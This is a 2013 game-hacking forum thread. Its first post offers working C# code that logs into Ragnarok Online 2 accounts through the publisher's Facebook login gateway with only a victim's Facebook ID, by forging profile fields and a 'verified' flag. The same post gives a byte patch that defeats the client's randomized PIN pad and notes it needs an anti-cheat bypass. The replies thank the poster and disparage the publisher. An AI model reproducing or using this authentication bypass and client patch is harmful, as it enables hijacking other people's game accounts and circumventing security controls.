Results 1 to 4 of 4
  1. #1
    lolzask
    lolzask is offline
    Guest
    Join Date
    2012 Dec
    Posts
    2
    Thanks Thanks Given 
    0
    Thanks Thanks Received 
    1
    Thanked in
    1 Post
    Rep Power
    0

    RO2 Facebook Login Bypass + Pin Unrandomizer

    All you need is your facebook id to login. Google on how to get ur fbid.

    Apparently the forum is being stupid and not allowing me to post the exact code of the bypass. If this gets thru maybe i can post the exact code.

    Code:
    public static string getFacebook(string fbid)
            {
                string address = "https://loginro2sg.playpark.net/ro2_main.aspx";
                var wc = new CGWebClient();
                wc.Headers.Add("Content-Type", "application/x-www-form-urlencoded");
       
                NameValueCollection collection = new NameValueCollection();
                // Add necessary parameter-value pairs to the name-value container
    
                collection.Add("__VIEWSTATE", "/wEPDwUKMTg5MDE1NTc2NGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgIFCmlidG5TdWJtaXQFDGlidG5GYWNlYm9va7PqCVBhE1OViM+2yfpNrWmULMvH");
                collection.Add("__EVENTVALIDATION", "/wEWBQKN8MnEDQLE4sXRBgKE8/26DAK1qbSRCwLF3pjlAf6JWLLpCZIJTmUN2MpkJyvBmK9q");
                collection.Add("ibtnFacebook.x", "128");
                collection.Add("ibtnFacebook.y", "41");
                collection.Add("txtEmail", "");
                collection.Add("txtPassword", "");
    
                wc.UploadValues(address, collection);
                string uriString = wc.ResponseUri.ToString();
                string ticket = uriString.Substring(uriString.IndexOf("ticket="));
                wc.DownloadString("https://facebook.com/dialog/oauth?client_id=423199094408819&response_type=token,signed_request,code&display=none&domain=securelogin3.playpark.net&origin=1&redirect_uri=https://s-static.ak.facebook.com/connect/xd_arbiter.php?version=19#cb=f36d309a2237a6a&origin=https%3A%2F%2Fsecurelogin3.playpark.net%2Ff122619832e210a&domain=securelogin3.playpark.net&relation=parent&sdk=joey");
                ////Full Method
                string fbLogin = "https://www.facebook.com/dialog/oauth?client_id=423199094408819&redirect_uri=" + wc.ResponseUri + "&scope=read_stream,email,user_birthday,publish_stream";
    
                string yeah = wc.DownloadString(fbLogin);
    
                string securePP = "https://securelogin3.playpark.net/facebook_gateway_games/fb-get-token.ashx?" + ticket;
                securePP += "&FBid=" + fbid;
                securePP += "&FBname=" + HttpUtility.UrlEncode("Some random name");
                securePP += "&FBdob=1/1/2001";
                securePP += "&FBgender=male";
                securePP += "&FBemail=" + "some_random_email@here.com";
                securePP += "&FBfirstname=" + HttpUtility.UrlEncode("Random");
                securePP += "&FBlastname=" + HttpUtility.UrlEncode("Stupid");
                securePP += "&FBtimezone=8";
                securePP += "&FBlink=https://www.facebook.com";
                securePP += "&FBlocale=en_US";
                securePP += "&FBVerified=true";
    
    
                string bypass = wc.DownloadString(securePP);
                Debug.WriteLine(bypass);
                return bypass.Replace('|', ' ');
    
            }
    Pin unrandomizing array
    U need a hackshield bypass for this to work. of course u can physically hex the client, but u will DC.
    byte[] bSearch = { 0xC2, 0x0C, 0x00, 0x55, 0x8B, 0xEC, 0x51, 0x51, 0x57 };
    byte[] bReplace = { 0xC2, 0x0C, 0x00, 0xC3, 0x8B, 0xEC, 0x51, 0x51, 0x57 };

    ---------- Post added 2013-03-25 at 01:47 AM ---------- Previous post was 2013-03-22 at 03:12 PM ----------

    facebook login method in c# code...

    For those with brains... the method has been found for months.. and why it wasnt released is because asiasoft is retarded.
    Last edited by lolzask; 2013-03-25 at 02:45 AM.

  2. The Following User Says Thank You to lolzask For This Useful Post:


  3. #2
    Dark Angel
    Dark Angel is offline
    Guest Dark Angel's Avatar
    Join Date
    2013 Feb
    Posts
    2
    Thanks Thanks Given 
    4
    Thanks Thanks Received 
    1
    Thanked in
    1 Post
    Rep Power
    0

    Red face

    Sorry I don't understand what does this do

  4. #3
    keile
    keile is offline
    New member
    Join Date
    2012 Dec
    Posts
    18
    Thanks Thanks Given 
    4
    Thanks Thanks Received 
    2
    Thanked in
    1 Post
    Rep Power
    0
    Thanks for the unrandomizing hex data. That was helpful )

  5. #4
    cyphergenetics
    cyphergenetics is offline
    Guest
    Join Date
    2013 Sep
    Posts
    2
    Thanks Thanks Given 
    0
    Thanks Thanks Received 
    0
    Thanked in
    0 Posts
    Rep Power
    0
    Asiasoft _is_ retarded. Even most if not all of their games are not encrypted and using crapshield Appreciate the code!

Similar Threads

  1. [AutoIt] Pinpad unrandomizer?
    By kd5eej350 in forum Ragnarok Online
    Replies: 2
    Last Post: 2013-02-04, 10:24 PM
  2. [Help] galaxy online 2 on facebook
    By steven in forum Browser Games
    Replies: 0
    Last Post: 2012-12-13, 04:40 PM
  3. How to open a store on Facebook Requiem
    By kilastyle in forum Requiem Online
    Replies: 0
    Last Post: 2012-10-07, 01:03 AM
  4. [Help] Car Town Facebook
    By fujiwarataku in forum Browser Games
    Replies: 3
    Last Post: 2012-09-27, 04:32 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •